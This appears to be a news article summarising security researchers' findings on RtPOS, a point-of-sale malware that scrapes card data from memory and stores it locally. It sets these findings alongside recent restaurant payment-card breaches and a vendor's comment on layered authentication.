Security researchers at Booz Allen Hamilton recently discovered a point-of-sale malware that originated in 2017 but stayed under the radar for a long time thanks to obfuscation tactics employed by malware authors.
Point-of-sale (PoS) terminals used by restaurant and retail chains have often been found to be vulnerable to malware intrusions and brute-force attacks as many of them lack the necessary security protocols and encryption to ward off targeted cyber-attacks.
Considering that PoS terminals can be exploited by hackers to gain personal and financial information of thousands of customers and also to steal gift cards and shopping points, they are the favourite hunting grounds for online fraudsters and cyber criminals who are in the business to make money.
In March this year, point-of-sale terminals at several Applebee restaurants that were operated by RMH Franchise Holdings suffered a breach that compromised guests’ names, credit or debit card numbers, expiration dates and card verification codes processed during limited time periods.
In May, international restaurant chain Brinker International announced that payment systems at several Chili’s restaurants were hacked into by fraudsters between March and April this year, resulting in the breach of payment card information including credit or debit card numbers as well as cardholder names.
Russian PoS malware masquerading as a Windows file
According to researchers at Booz Allen Hamilton, the point-of-sale malware they discovered purported to be “Windows Logon Service”, featured a file name alohae.exe as an obfuscation tactic, and featured a Russian (RU) language code.
Dubbed RtPOS by the researchers, the point-of-sale malware uses a ReadProcessMemory function to gain access to a compromised system’s memory space, and therefore allows hackers behind it to gain access to stored payment card details before any encryption solutions can be applied to such details. The access to the memory space also allows the malware to pass on scraped payment card data to a custom track search algorithm termed Luhn.
Once the Luhn algorithm validates a credit card number scraped by the point-of-sale malware, the credit card number is then stored in a DAT file created by the malware. The said DAT file is created in the \Windows\SysWOW64 folder and contains the date and time, the process used to write the information to the DAT log file, and also the payment card details.
Not any ordinary point-of-sale malware
“RtPOS is unique in comparison to other fully featured POS malware like Project Hook and TreasureHunter, in that it has no native exfiltration capability. While other POS malware families are perfectly capable of sending captured Track1 and Track2 data to a C2 server, RtPOS merely saves the data locally,” the researchers noted.
“This is likely intended to reduce the network activity footprint of RtPOS and ensure the malware remains undetected for longer, thus earning the controllers a healthier profit. The RtPOS malware is also simplistic in features, largely automated in operation, and lacks many of the features that more mature POS malware families do.”
They added that the lack of a network exfiltration feature, interaction and user commands, as well as a dropper component indicates that in order for the point-of-sale malware to execute and retrieve cautured information, hackers need to have existing access to a targeted POS machine.
Since RtPOS seems more like a post-compromise tool instead of a standalone malware, it is also possible that it could be part of a larger tool set, they theorised.
“To protect consumers and companies from the fraud that can stem from a POS breach, companies transacting online need to change the paradigm. By implementing verification technologies such and passive biometrics and behaviour analytics, companies can verify customers beyond their credit card number, credentials, and any other data so they can be positively identified by their online behaviour,” said Ryan Wilk, vice president at NuData Security.
“This increased authentication as part of a layered security framework allows retailers to block fraudulent transactions even if the right passwords, credit card numbers, or security questions are used. It also allows them to correctly identify key customers to offer rewards, bonuses and more,” he added.